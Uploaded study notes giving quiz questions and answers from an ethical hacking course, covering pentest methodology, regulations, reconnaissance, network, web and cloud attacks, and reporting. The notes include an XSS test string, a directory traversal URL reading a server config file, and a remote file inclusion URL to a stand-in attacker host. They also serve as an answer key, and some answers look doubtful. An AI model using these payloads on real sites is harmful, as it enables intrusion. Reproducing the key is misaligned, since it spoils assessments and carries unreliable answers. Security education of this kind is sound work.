Ethical Hacker

Uploaded by Lux Luminous

Yes, I accept my responsibility as specified in the Ethical Hacking Statement.

Which three internet job boards allow filtering job postings by seniority or experience level?
(Choose all that apply.)
● glassdoor.com
● indeed.com
● linkedin.com jobs
Protego has been contracted to do a network infrastructure test as part of a broader
penetration testing engagement. What will you be targeting in this test? (Choose all
that apply.)
● switches
● IPS devices
● AAA servers
Under what tactic in the MITRE ATT&CK matrix would you find the information
gathering stage of the Operation Dream Job procedure?
● Reconnaissance.

You need to setup a penetration testing practice lab because some of the tools that
are preferred at Protego are new to you. What best practices will you follow as you
setup your lab? (Choose all that apply.)

● Ensure closed access to the network and internet.
● Create a virtualized computing environment.
● Provide sufficient hardware resources to ensure valid results

You have just downloaded and installed VirtualBox or UTM. You start the
application, but you do not see the Kali VM running. What step did you forget?
- You must download and import or run the Kali VM file in VirtualBox or UTM

You have just started Kali and open a terminal from the panel. What will the
response be when you enter the pwd command at the prompt?
- /home/kali

1.4.3 Quiz - Introduction to Ethical Hacking and Penetration Testing


Question 1

Which statement best describes the term ethical hacker?

a person who uses different tools than nonethical hackers to find vulnerabilities
and exploit targets
a person that is financially motivated to find vulnerabilities and exploit targets
a person that is looking to make a point or to promote what they believe
a person who mimics an attacker to evaluate the security posture of a network

Question 2
Which threat actor term describes a well-funded and motivated group that will use
the latest attack techniques for financial gain?

hacktivist
state-sponsored attacker
organized crime
insider threat
Question 3

Which type of threat actor uses cybercrime to steal sensitive data and reveal it
publicly to embarrass a target?

organized crime
hacktivist
insider threat
state-sponsored attacker
Question 4

What is a state-sponsored attack?

An attack perpetrated by a well-funded and motivated group that will typically use
the latest attack techniques for financial gain.
An attack perpetrated by governments worldwide to disrupt or steal information
from other nations.
An attack perpetrated by disgruntled employees inside an organization.
An attack is perpetrated to steal sensitive data and then reveal it to the public to
embarrass or financially affect a target.
Question 5

What is an insider threat attack?

An attack perpetrated by a well-funded and motivated group that will typically use
the latest attack techniques for financial gain.
An attack perpetrated by governments worldwide to disrupt or steal information
from other nations.
An attack perpetrated by disgruntled employees inside an organization.
An attack is perpetrated to steal sensitive data and then reveal it to the public to
embarrass or financially affect a target.
Question 6

What kind of security weakness is evaluated by application-based penetration tests?

firewall security
logic flaws
wireless deployment
data integrity between a client and a cloud provider
Question 7
What two resources are evaluated by a network infrastructure penetration test?
(Choose two.)

AAA servers
CSPs
web servers
IPSs
back-end databases
Question 8

When conducting an application-based penetration test on a web application, the
assessment should also include testing access to which resources?

AAA servers
cloud services
switches, routers, and firewalls
back-end databases
Question 9

What is the purpose of bug bounty programs used by companies?

reward security professionals for finding vulnerabilities in the systems of the
company
reward security professionals for discovering malicious activities by attackers in
the systems of the company
reward security professionals for fixing vulnerabilities in the systems of the
company
reward security professionals for breaking into a corporate facility to expose
weaknesses in the physical perimeter
Question 10

What characterizes a partially known environment penetration test?

The tester must test the electrical grid supporting the infrastructure of the target.
The tester is provided with a list of domain names and IP addresses in the scope
of a particular target.
The test is a hybrid approach between unknown and known environment tests.
The tester should not have prior knowledge of the organization and infrastructure
of the target.
Question 11

What characterizes a known environment penetration test?

The test is somewhat of a hybrid approach between unknown and known
environment tests.
The tester could be provided with network diagrams, IP addresses, configurations,
and user credentials.
The tester should not have prior knowledge of the organization and infrastructure
of the target.
The tester may be provided only the domain names and IP addresses in the scope
of a particular target.
Question 12

Which type of penetration test would only provide the tester with limited information
such as the domain names and IP addresses in the scope?

known-environment test
partially known environment test
unknown-environment test
OWASP Web Security Testing Guide
Question 13

Match the penetration testing methodology to the description.

Categories:
PTES: provides information about types of attacks and methods
MITRE ATT&CK: collection of different matrices of tactics and techniques that
adversaries use while preparing for an attack
OWASP WSTG: covers the high-level phases of web application security testing
NIST SP 800-115: provides organizations with guidelines on planning and
conducting information security testing
OSSTMM: lays out repeatable and consistent security testing

Question 14

Which three options are phases in the Penetration Testing Execution Standard
(PTES)? (Choose three.)

Threat modeling
Penetration
Reporting
Enumerating further
Network mapping
Exploitation
Question 15

Which two options are phases in the Information Systems Security Assessment
Framework (ISSAF)? (Choose two.)

Pre-engagement interactions
Maintaining access
Reporting
Post-exploitation
Vulnerability identification
Question 16

Which two options are phases in the Open Source Security Testing Methodology
Manual (OSSTMM)? (Choose two.)

Vulnerability Analysis
Maintaining Access
Work Flow
Network Mapping
Trust Analysis
Question 17

Which penetration testing methodology is a comprehensive guide focused on web
application testing?

MITRE ATT&CK
OWASP WSTG
NIST SP 800-115
OSSTMM
Question 18

Which option is a Linux distribution that includes penetration testing tools and
resources?

OWASP
PTES
SET
BlackArch
Question 19

Which option is a Linux distribution URL that provides a convenient learning
environment about pen testing tools and methodologies?

vmware.com
attack.mitre.org
parrotsec.org
virtualbox.org
Question 20

What does the "Health Monitoring" requirement mean when setting up a penetration
test lab environment?

The tester needs to be sure that a lack of resources is not the cause of false
results.
The tester needs to be able to determine the causes when something crashes.
The tester needs to ensure controlled access to and from the lab environment and
restricted access to the internet.
The tester validates a finding running the same test with a different tool to see if
the results are the same.
Question 21

Which tool would be useful when performing a network infrastructure penetration
test?

vulnerability scanning tool
bypassing firewalls and IPSs tool
interception proxies tool
mobile application testing tool
Question 22

Which tool should be used to perform an application-based penetration test?

sniffing traffic tool
bypassing firewalls and IPSs tool
interception proxies tool
cracking wireless encryption tool
Question 23

Which tools should be used to perform a wireless infrastructure penetration test?

web vulnerability detection tools
traffic manipulation tools
proxy interception tools
de-authorizing network devices tools
Question 24

Which tools should be used for testing the server and client platforms in an
environment?

cracking wireless encryption tools
vulnerability scanning tools
interception proxies tools
de-authorizing network devices tools
Question 25

Sometimes a tester cannot virtualize a system to do the proper penetration testing.
What action should be taken if a system cannot be tested in a virtualized
environment?

a full backup of the system
rebuild the system after any test is performed
adopt penetration test tools that will certainly not damage the system
a complete report with recommended repairs

2.1.4 Practice - Regulations

Place the options in the following order:

● General Data Protection Regulation (GDPR): strengthens and unifies data
protection for individuals within the European Union
● NIST SP 800-57: guidelines for encryption key management
● Payment Card Industry Data Security Standard (PCI DSS): secures the
processing of credit card and other types of digital payments
● Gramm-Leach-Bliley Act (GLBA): applies to all financial services organizations,
regardless of size
● Health Insurance Portability and Accountability Act (HIPAA): safeguards
electronic health information
2.1.8 Practice - Legal Concepts

Place the options in the following order:

● Service-level agreement (SLA): documented minimum and maximum
performance expectations of the penetration test service
● Confidentiality agreement: regarding how to communicate and handle sensitive
data, such as account credentials that were uncovered by the testing
● Disclaimer: statements such as "The penetration test report cannot and does
not protect against personal or business loss resulting from the test
agreement."
● Non-disclosure agreement (NDA): specifies and defines confidential material,
knowledge, and information that should be kept confidential and not be
disclosed to outside parties
Question 1

Answer: HIPAA

Question 2

Answer: FedRAMP

Question 3

Answer: GDPR

Question 4

Answer: Federal Trade Commission (FTC)

Question 5

Answer: healthcare clearinghouse

Question 6

Answer: health plan

Question 7

Answer: primary account number

Question 8

Answers:

● CAV2/CVC2/CVV2/CID
● full magnetic strip data or equivalent data on a chip
Question 9

● Part 1: General — provides general guidance and best practices for the
management of cryptographic keying material.
● xPart 2: Best Practices for Key Management Organization — provides
guidance on policy and security planning requirements for U.S.
government agencies.
● xPart 3: Application Specific Key Management Guidance — provides
guidance when using the cryptographic features of current systems.

Question 10

Answer: documentation of permission for performing the tests from the client
institutions

Question 11

Answer: service-level agreement (SLA)

Question 12

Answer: statement of work (SOW)

Question 13

Answer: unilateral NDA

Question 14

Answer: contract

Question 15

Answer: disclaimers

Question 16

Answers:

● testing timeline
● location of testing
● preferred method of communication

Question 17

Answer: types of allowed or disallowed tests

Question 18

Answer: Web Services Description Language (WSDL) document


Question 19

Answer: GraphQL documentation

Question 20

Answer: system and network architectural diagram

Question 21

Answer: ineffective identification of what technical and nontechnical elements
will be required for the penetration test

Question 22

Answer: Question the company contact person and review contracts.

Question 23

Answers:

● PGP
● S/MIME

Question 24

Answer: This type of testing is where the consultant will be provided with very
limited information about the targeted systems and network.

Question 25

Answer: the amount of information provided to the consultant

2.3.2 Practice - Demonstrate an Ethical Hacking Mindset

● background checks of penetration testing teams: Check the credentials and
skills of the individuals performing the penetration test.
● adherence to the specific scope of engagement: Create a list of applications,
systems, or networks to be tested.
● Limiting invasiveness based on scope: Specify tools and attacks that could be
detrimental and disruptive for your client’s systems.
● Limiting the use of tools used in a particular penetration test: Specifying the
allowed, or disallowed, testing tools.
● Identification and immediate reporting of criminal activity: Report evidence of
any system or network that was previously compromised.

3.5

Question 1

Which two tools could be used to gather DNS information passively? (Choose
two.)

● Recon-ng
● Dig

Question 2

When performing passive reconnaissance, which Linux command can be used
to identify the technical and administrative contacts of a given domain?

● whois

Question 3

Which specification defines the format used by image and sound files to
capture metadata?

● Exchangeable Image File Format (Exif)

Question 4

Why would a penetration tester perform a passive reconnaissance scan
instead of an active one?

● to collect information about a network without being detected

Question 5

What type of server is a penetration tester enumerating when they enter the
nmap -sU command?

● DNS, SNMP, or DHCP server

Question 6

What is the disadvantage of conducting an unauthenticated scan of a target
when performing a penetration test?

● Vulnerability of services running inside the target may not be detected.

Question 7

What is required for a penetration tester to conduct a comprehensive
authenticated scan against a Linux host?

● user credentials with root-level access to the target system

Question 8

In which circumstance would a penetration tester perform an unauthenticated
scan of a target?

● when user credentials were not provided

Question 9

Why would a penetration tester use the nmap -sF command?

● when a TCP SYN scan is detected by a network filter or firewall

Question 10
What is the purpose of host enumeration when beginning a penetration test?

● to identify all active IP addresses within the scope of the test

Question 11

What can be deduced when a tester enters the nmap -sF command to perform
a TCP FIN scan and the target host port does not respond?

● that the port is open

Question 12

What is the disadvantage of running a TCP Connect scan compared to running
a TCP SYN scan during a penetration test?

● The extra packets required may trigger an IDS alarm.

Question 13

When a penetration test identifies a vulnerability, how should the vulnerability
be further verified?

● determine if the vulnerability is exploitable

Question 14

Why is the Common Vulnerabilities and Exposures (CVE) resource useful
when investigating vulnerabilities detected by a penetration test?

● It is an international consolidation of cybersecurity tools and databases.

Question 15

What is the purpose of applying the Common Vulnerability Scoring System
(CVSS) to a vulnerability detected by a penetration test?

● to calculate the severity of the vulnerability

Question 16

A threat actor is looking at the IT and technical job postings of a target
organization. What would be the most beneficial information to capture from
these postings?

● the type of hardware and software used

Question 17

How is open-source intelligence (OSINT) gathering typically implemented
during a penetration test?

● by using public internet searches

Question 18

What initial information can be obtained when performing user enumeration in
a penetration test?

● a valid list of users

Question 19

What useful information can be obtained by running a network share
enumeration scan during a penetration test?

● systems on a network that are sharing files, folders, and printers

Question 20

A penetration tester must run a vulnerability scan against a target. What is the
benefit of running an authenticated scan instead of an unauthenticated scan?

● Authenticated scans can provide a more detailed picture of the target
attack surface.

Question 21

What are three considerations when planning a vulnerability scan on a target
production network during a penetration test? (Choose three.)

● the timing of the scan
● the available network bandwidth
● the network topology

Question 22

When performing a vulnerability scan of a target, how can adverse impacts on
traversed devices be minimized?

● The scan should be performed as close to the target as possible.

Question 23

A company hires a cybersecurity consultant to conduct a penetration test to
assess vulnerabilities in network systems. The consultant is preparing the
final report to send to the company. What is an important feature of a final
penetration test report?

● It gives an accurate presentation of vulnerabilities.

Question 24
What is the advantage of using the target Wi-Fi network for reconnaissance
packet inspection?

● Physical access to the building may not be required.

Question 25

What guidance does the NIST Cybersecurity Framework provide to help
improve an organization's cybersecurity posture?

● The framework outlines standards and industry best practices.

5.3

Question 1

Which NetBIOS service is used for connection-oriented communication?

● Answer: NetBIOS-SSN

Question 2

Match the port type and number with the respective NetBIOS protocol service.

● UDP port 138 - NetBIOS Datagram Service (A)
● UDP port 137 - NetBIOS Name Service (B)
● TCP port 445 - SMB protocol (C)
● TCP port 139 - NetBIOS Session Service (D)
● TCP port 135 - Microsoft Remote Procedure Call (MS-RPC) (E)

Question 3

What two features are present on DNS servers using BIND 9.5.0 and higher
that help mitigate DNS cache poisoning attacks? (Choose two.)

● Answer:
○ randomization of ports
○ provision of cryptographically secure DNS transaction identifiers

Question 4
What UDP port number is used by SNMP protocol?

● Answer: 161

Question 5

Which is a characteristic of a DNS poisoning attack?

● Answer: The DNS resolver cache is manipulated.

Question 6

Which Kali Linux tool or script can gather information on devices configured
for SNMP?

● Answer: snmp-check

Question 7

Match the SMTP command with the respective description.

● MAIL - used to denote the email address of the sender (A)
● RSET - used to cancel an email transaction (B)
● EHELO - used to initiate a conversation with an Extended Simple Mail
Transport Protocol server (C)
● DATA - used to initiate the transfer of the contents of an email message
(D)
● STARTTLS - used to start a Transport Layer Security connection to an
email server (E)
● HELO - used to initiate an SMTP conversation with an email server (F)

Question 8

Which two best practices would help mitigate FTP server abuse and attacks?
(Choose two.)

● Answer:
○ limit anonymous logins to a select group of people
○ require re-authentication of inactive sessions

Question 9

Which is a characteristic of the pass-the-hash attack?

● Answer: capture of a password hash (as opposed to the password
characters) and using the same hashed value for authentication and
lateral access to other networked systems

Question 10

What is a Kerberoasting attack?

● Answer: It is a post-exploitation attempt that is used to extract service
account credential hashes from Active Directory for offline cracking.

Question 11

Match the attack type with the respective description.

● Reflected DOS (A) - This attack uses spoofed packets that appear to be
from the victim. Then the sources become unwitting participants in the
attack by sending the response traffic back to the intended victim.
● DNS Amplification (B) - This an attack in which the attacker exploits
vulnerabilities in target servers to initially turn small queries into much
larger payloads, which are used to bring down the servers of the victim.
● Direct DOS (C) - This occurs when the source of the attack generates the
packets, regardless of protocol, application, and so on, that are sent
directly to the victim of the attack.
● DDOS (D) - This attack uses botnets that can be manipulated from a
command and control (CnC, or C2) system.

Question 12

Match the attack type with the respective description.

● Route Manipulation attacks (A) - typically a BGP hijacking attack by
configuring or compromising an edge router to announce prefixes that
have not been assigned to the organization
● Downgrade attacks (B) - the attacker forces a system to favor a weak
encryption protocol or hashing algorithm that may be susceptible to
other vulnerabilities
● DHCP Starvation attack (C) - an attacker floods a server with bogus
DISCOVER packets until the server exhausts the supply of IP addresses
● VLAN Hopping attack (D) - an attacker bypass any layer 2 restrictions
built to divide hosts
● MAC address spoofing attack (E) - an attacker spoofs the physical
address of the NIC device to match the address of another on a network
in order to gain unauthorized access or launch a Man-in-the-Middle
attack

Question 13

Which tool can be used to perform a Disassociation attack?

● Answer: Airmon-ng

Question 14

Which is a characteristic of a Bluesnarfing attack?

● Answer: An attack that can be performed using Bluetooth with
vulnerable devices in range. This attack actually steals information from
the device of the victim.

Question 15

Which Wi-Fi protocol is most vulnerable to a brute-force attack during a Wi-Fi
network deployment?

● Answer: WPS

Question 16

What does the MFP feature in the 802.11w standard do to protect against
wireless attacks?

● Answer: It helps defend against deauthentication attacks.

Question 17

What is a DNS resolver cache on a Windows system?

● Answer: It is a temporary database that contains records of all the
recent visits and attempted visits to websites and other internet
domains.

Question 18

Match the TCP port number with the respective email protocol that uses it.

● 465 (A) - The port registered by the Internet Assigned Numbers
Authority (IANA) for SMTP over SSL (SMTPS).
● 587 (B) - The Secure SMTP (SSMTP) protocol for encrypted
communications, as defined in RFC 2487, using STARTTLS.
● 143 (C) - The default port used by the IMAP protocol in non-encrypted
communications.
● 995 (D) - The default port used by the POP3 protocol in encrypted
communications.
● 993 (E) - The default port used by the IMAP protocol in encrypted
(SSL/TLS) communications.

Question 19

Which is the default TCP port used in SMTP for non-encrypted
communications?

● Answer: 25

Question 20

What is a characteristic of a Kerberos silver ticket attack?

● Answer: It uses forged service tickets for a given service on a particular
server.

Question 21

Which attack is a post-exploitation activity that an attacker uses to extract
service account credential hashes from Active Directory for offline cracking?

● Answer: Kerberoasting

Question 22

Which four items are needed by an attacker to create a silver ticket for a
Kerberos silver ticket attack? (Choose four.)

● Answer:
○ hash value
○ system account
○ FQDN
○ target service

Question 23

Which kind of attack is an IP spoofing attack?

● Answer: On-path

Question 24

What is a common mitigation practice for ARP cache poisoning attacks on
switches to prevent spoofing of Layer 2 addresses?

● Answer: DAI

Question 25

An attacker is launching a reflected DDoS attack in which the response traffic
is made up of packets that are much larger than those that the attacker initially
sent. Which type of attack is this?

● Answer: amplification

6.13

Question 1
Which two functions are provided by a web proxy device? (Choose two.)

● Caching of HTTP messages
● Enabling HTTP transfers across a firewall

Question 2
Match the HTTP status code contained in a web server response to the description.

● Codes in the 200 range: Related to successful transactions
● Codes in the 300 range: Related to HTTP redirections
● Codes in the 400 range: Related to client errors
● Codes in the 500 range: Related to server errors
● Codes in the 100 range: Informational

Question 3
Match the elements in the URL
ftp://xyz-company.com:2457/support/file;id=65?name=intro&r=true
to the description.

● xyz-company.com: Host
● 2457: Port
● support/file: Path
● ftp: Scheme
● name=intro&r=true: Query-string
● id=65: Path-segment-params

Question 4
Which function is provided by HTTP 2.0 to improve performance over HTTP 1.1?

● HTTP 2.0 provides HTTP message multiplexing and requires fewer messages
to download web content.

Question 5
Why should application developers change the session ID names used by common
web application development frameworks?

● These session ID names can be used to fingerprint the application framework
employed.

Question 6
Which mechanism is used by a shopping site to securely maintain user
authentication during shopping?

● Session ID

Question 7
What is the best mitigation approach against session fixation attacks?

● Ensure that the session ID is used after a user completes authentication.

Question 8
Which two attributes can be set in a web application cookie to indicate it is a
persistent cookie? (Choose two.)

● Expires
● Max-Age

Question 9
Which international organization is dedicated to educating industry professionals,
creating tools, and evangelizing best practices for securing web applications and
underlying systems?

● Open Web Application Security Project (OWASP)

Question 10
Which component in the statement below is most likely user input on a web form?
SELECT * FROM group WHERE attack = ‘network’ AND a-type LIKE
‘ping%’;

● Ping

Question 11
Which statement describes an example of an out-of-band SQL injection attack?

● An attacker launches the attack on a web site and forces the web application
to send the query results via an email.

Question 12
A threat actor launches an SQL injection attack by sending multiple specific
statements and reconstructing the key information. What type of attack is this?

● In-band

Question 13
Which technique exploits SQL injection vulnerability by making the application
perform multiple SELECT queries?

● Union operator

Question 14
Which type of SQL query is in the SQL statement select * from users where
user = "admin";?

● Static query

Question 15
Which type of penetration testing can be used to verify the configuration of Microsoft
Active Directory?

● LDAP injection

Question 16
What is a potentially dangerous web session management practice?

● Including the session ID in the URL

Question 17
What is the effect of the HTTPOnly flag in cookies?

● It forces the web browser to have the cookies processed only by the server.

Question 18
Which threat does a security policy that configures routers and switches with
advanced security measures mitigate?

● Default credential attack

Question 19
What type of vulnerability does the attacker try to exploit with the following request:
https://portal.a-univ.edu/?search=students&results=50&search=staff?

● HTTP parameter pollution

Question 20
Where would a tester use the string <script>alert("XSS Test Now")</script> to
test for cross-site scripting vulnerabilities?

● In a user input field in a web form

Question 21
According to OWASP, which three rules help prevent XSS attacks? (Choose three.)

● Use HTML escape before inserting untrusted data into HTML element
content.
● Use attribute escape before inserting untrusted data into HTML common
attributes.
● Use JavaScript escape before inserting untrusted data into JavaScript data
values.

Question 22
Which type of web vulnerability is being exploited by the attacker using the following
URL: http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf?

● Directory traversal

Question 23
Which type of vulnerability did the attacker try to exploit using the following URL:
http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html?

● Remote file inclusion

Question 24
Which insecure code practice enables a catastrophic threat where an attacker
compromises the application or system?
● Use of hard-coded credentials

Question 25
What is the best practice to mitigate vulnerabilities from a lack of proper error
handling in an application?

● Use a well-thought-out scheme to provide meaningful error messages to the
users but no useful information to an attacker.

7.3

Question 1

Which term is an essential characteristic of cloud computing as defined in
NIST SP 800-145?
Answer: resource pooling

Question 2

Which cloud technology attack method involves breaching the infrastructure
to gather and steal information such as valid usernames, passwords, tokens,
and PINs?
Answer: credential harvesting

Question 3

Which cloud technology attack method could exploit a bug in a software
application to gain access to resources that normally would not be accessible
to a user?
Answer: privilege escalation

Question 4

Which term describes when a lower-privileged user accesses functions
reserved for higher-privileged users?
Answer: vertical privilege escalation

Question 5

Which cloud technology attack method could a threat actor use to access a
user or application account that allows access to more accounts and
information?
Answer: account takeover

Question 6

Which tool could be used to find vulnerabilities that could lead to metadata
service attacks?
Answer: Dagda

Question 7

Which cloud technology attack method could generate crafted packets to
cause a cloud application to crash?
Answer: resource exhaustion attack

Question 8

Which cloud technology attack method would require the threat actor to create
a malicious application and install it into a SaaS, PaaS, or IaaS environment?
Answer: cloud malware injection attack

Question 9

What is a common cause of data breaches in attacks against misconfigured
cloud assets?
Answer: using insecure permission configurations for cloud object storage services

Question 10
A threat actor has compromised a VM in a cloud environment that shares the
same physical hardware as non-compromised VMs. Which cloud technology
attack method could now be used to exfiltrate credentials, cryptographic keys,
and other sensitive information?
Answer: side-channel attack

Question 11

Which tool helps software developers and cloud consumers deploy
applications in the cloud and use the resources that the cloud provider offers?
Answer: Cloud development kits (CDKs)

Question 12

Which mobile device vulnerability is targeted when a threat actor reverse
engineers a mobile app to see how it creates and stores keys in the iOS
Keychain?
Answer: insecure storage

Question 13

Which tool is an open-source framework used to test the security of iOS
applications?
Answer: Needle

Question 14

Match the Bluetooth Low Energy (BLE) phase to the description.

● Phase 1: pairing feature exchange
● Phase 2: short-term key generation
● Phase 3: transport-specific key distribution

Question 15

Which option is a security vulnerability that affects IoT implementations?

Answer: plaintext communication and data leakage

Question 16

Which two IoT systems should never be exposed to the Internet? (Choose
two.)

● turbines in a power plant
● robots in a factory

Question 17

Which option is a collection of compute interface specifications designed to
offer management and monitoring capabilities independently of the CPU,
firmware, and operating system of the host?
Answer: Intelligent Platform Management Interface (IPMI)

Question 18

A threat actor uploaded a VM with malicious software to the VMware
Marketplace. When an organization deploys the VM, the threat actor can
manipulate the systems, applications, and user data. What type of VM
vulnerability has been enabled?
Answer: VM repository vulnerability

Question 19

Which tool is a set of open-source analysis tools that uses the ClamAV
antivirus engine to help detect vulnerabilities, Trojans, backdoors, and
malware in Docker images and containers?
Answer: Clair

Question 20

Which credential harvesting tool could be used to send a spear phishing email
with a link to a malicious site to a target victim?
Answer: Social-Engineer Toolkit (SET)

Question 21

Why do cloud architectures help minimize the impact of DoS or DDoS attacks
compared to hosting services on-premises?
Answer: cloud providers use a distributed architecture

Question 22

Which option is a characteristic of a VM hypervisor?
Answer: Type 1 hypervisors are also known as native or bare-metal hypervisors.

Question 23

A threat actor has compromised a VM in a data center and discovered a
vulnerability that provides access to data in another VM. What type of VM
vulnerability has been discovered?
Answer: VM escape vulnerability

Question 24

Which tool can be used to perform on-path attacks in BLE implementations?
Answer: GATTacker

Question 25

Which tool is an open-source container vulnerability scanner that can be used
to find vulnerabilities in a Docker image?
Answer: Anchore’s Grype

9.5

Question 1:
Which industry-standard method has created a catalog of known vulnerabilities that
provides a score indicating the severity of a vulnerability?

● CVSS

Question 2:
Which vulnerability catalog creates a list of publicly known vulnerabilities, each
assigned an ID number, description, and reference?

● CVE

Question 3:
Match the CVSS metric group with the respective information.

● A: Base metric group: includes exploitability metrics and impact metrics
● B: Environmental metric group: includes modified base metrics,
confidentiality, integrity, and availability requirements
● C: Temporal metric group: includes exploit code maturity, remediation level,
and report confidence

Question 4:
Which three items are included in the base metric group used by CVSS? (Choose
three.)

● Attack complexity
● Integrity impact
● User interaction

Question 5:
Which item is included in the environmental metric group used by CVSS?

● Confidentiality requirements

Question 6:
Which item is included in the temporal metric group used by CVSS?

● Exploit code maturity

Question 7:
Which tool can ingest the results from many penetration testing tools a cybersecurity
analyst uses and help this professional produce reports in formats such as CSV,
HTML, and PDF?

● Dradis

Question 8:
Match the description to the respective control category.

● Key rotation: Technical control
● Input sanitization: Technical control
● Secure software development life cycle: Administrative control
● Role-based access control: Administrative control
● Time-of-day restrictions: Operational control
● Job rotation: Administrative control
● Video surveillance: Physical control
● Biometric controls: Physical control

Question 9:
Which two items are examples of technical controls that can be recommended as
mitigations and remediation of the vulnerabilities found during a pen test? (Choose
two.)

● Multifactor authentication
● Certificate management

Question 10:
A recent pen test resulted in a cybersecurity analyst report that includes information on
process-level remediation, patch management, and secrets management solutions.
Which control category is represented by this example?

● Operational

Question 11:
Which document provides several cheat sheets and detailed guidance on preventing
vulnerabilities such as cross-site scripting, SQL injection, and command injection?

● OWASP

Question 12:
A cybersecurity analyst report should contain minimum password requirements and
policies and procedures. These are examples that are included in which control
category?

● Administrative

Question 13:
Which control category includes information on mandatory vacations and user
training in the cybersecurity analyst report?

● Administrative

Question 14:
When creating a cybersecurity analyst report, which control category includes
information concerning the access control vestibule?

● Physical

Question 15:
Match the term to the respective description.
● A: False positive: A security device triggers an alarm, but there is no
malicious activity or actual attack taking place
● B: True positive: A successful identification of a security attack or a malicious
event
● C: False negative: Malicious activities that are not detected by a network
security device
● D: True negative: An intrusion detection device identifies an activity as
acceptable behavior and the activity is acceptable

Question 16:
Which kind of event is also called a "benign trigger"?

● False positive

Question 17:
Which kind of events diminish the value and urgency of real alerts?

● False positives

Question 18:
Which kinds of events are malicious activities not detected by a network security
device?

● False negatives

Question 19:
Which kind of event occurs when an intrusion detection device identifies an activity
as acceptable behavior and the activity is acceptable?

● True negative

Question 20:
Which kind of event is a successful identification of a security attack?

● True positive

Question 21:
Which example of technical control is recommended to mitigate and prevent
vulnerabilities such as cross-site scripting, cross-site request forgery, SQL injection,
and command injection?

● User input sanitization

Question 22:
Which example of administrative controls enables administrators to control what
users can do at both broad and granular levels?

● RBAC

Question 23:
A document entitled "Building an Information Technology Security Awareness and
Training Program" succinctly defines why security education and training are so
important for users. The document defines ways to improve the security operations
of an organization. Which document is being described?

● NIST SP 800-50

Question 24:
How is the score that CVSS provides interpreted?

● Scores are rated from 0 to 10, with 10 being the most severe

Question 25:
What control category does system hardening belong to?

● Technical

10.3

Question 1

Which two items are programming logic constructs? (Choose two.)

● Conditionals
● Boolean operators

Question 2

Which two items are data structures used in programming languages?
(Choose two.)

● Arrays
● Lists

Question 3

Which two items can be included in a library? (Choose two.)

● Subroutines
● Message templates

Question 4

What is the definition of a procedure used in application software?

● It is a section of code that is created to perform a specific task.

Question 5

Which programming language data structure is a special variable with more
than one value at a time?

● Array

Question 6

Which term describes a programming language component such as
JavaScript Object Notation (JSON)?

● Data structures

Question 7

What kind of data structure in Python is represented in the example below?

cves = ['CVE-2022-0945', 'CVE-2023-1234', 'CVE-2022-0987']
● List

Question 8

Which programming language elements perform similar tasks?

● Procedures and functions

Question 9

What is the definition of a library in application software?

● It is a collection of resources that can be reused by programs.

Question 10

Which domain name database query utility has been restricted by the
European Union's General Data Protection Regulation (GDPR) to protect
privacy?

● Whois

Question 11

What are two tools that can be used to perform active reconnaissance?
(Choose two.)

● Zenmap
● Maltego

Question 12

What are two tools that can be used to perform credential attacks? (Choose
two.)

● Mimikatz
● Patator

Question 13

Which Linux distribution comes with more than 1900 security penetration
testing tools?

● Kali Linux

Question 14

Which tool is designed to find metadata and hidden information in
documents?

● ExifTool

Question 15

Which programming language element is a block of code that can be reused
multiple times to execute a specific task?

● Function

Question 16

Which tool organizes query entities within the Entity Palette and calls the
search options "transforms"?

● Maltego

Question 17

Which programming language element is a code template that includes initial
variables and functions for creating an object?

● Class

Question 18

Which passive reconnaissance tool can be used to find information about
devices and networks on the Internet?

● Censys

Question 19

What is a command-line tool that allows for interactive or non-interactive
command execution?

● Bash

Question 20

Which popular Linux penetration testing distribution is based on Debian
GNU/Linux and has evolved from WHoppiX, WHAX, and BackTrack?

● Kali Linux

Question 21

Which vulnerability scanner tool offers a cloud-based service that performs
continuous monitoring, vulnerability management, and compliance checking?

● Qualys

Question 22

Which option is a PowerShell-based post-exploitation tool that can maintain
persistence on a compromised system and run PowerShell agents without the
need for powershell.exe?

● Empire

Question 23

Which tool can be used with Metasploit to maintain stealth and avoid detection
from security controls implemented by an organization?

● Veil

Question 24

Which encoding method can secretly exfiltrate confidential data in the payload
of DNS packets?

● Base64

Question 25

Which option is a Linux distribution tool for forensic evidence collection?

● CAINE
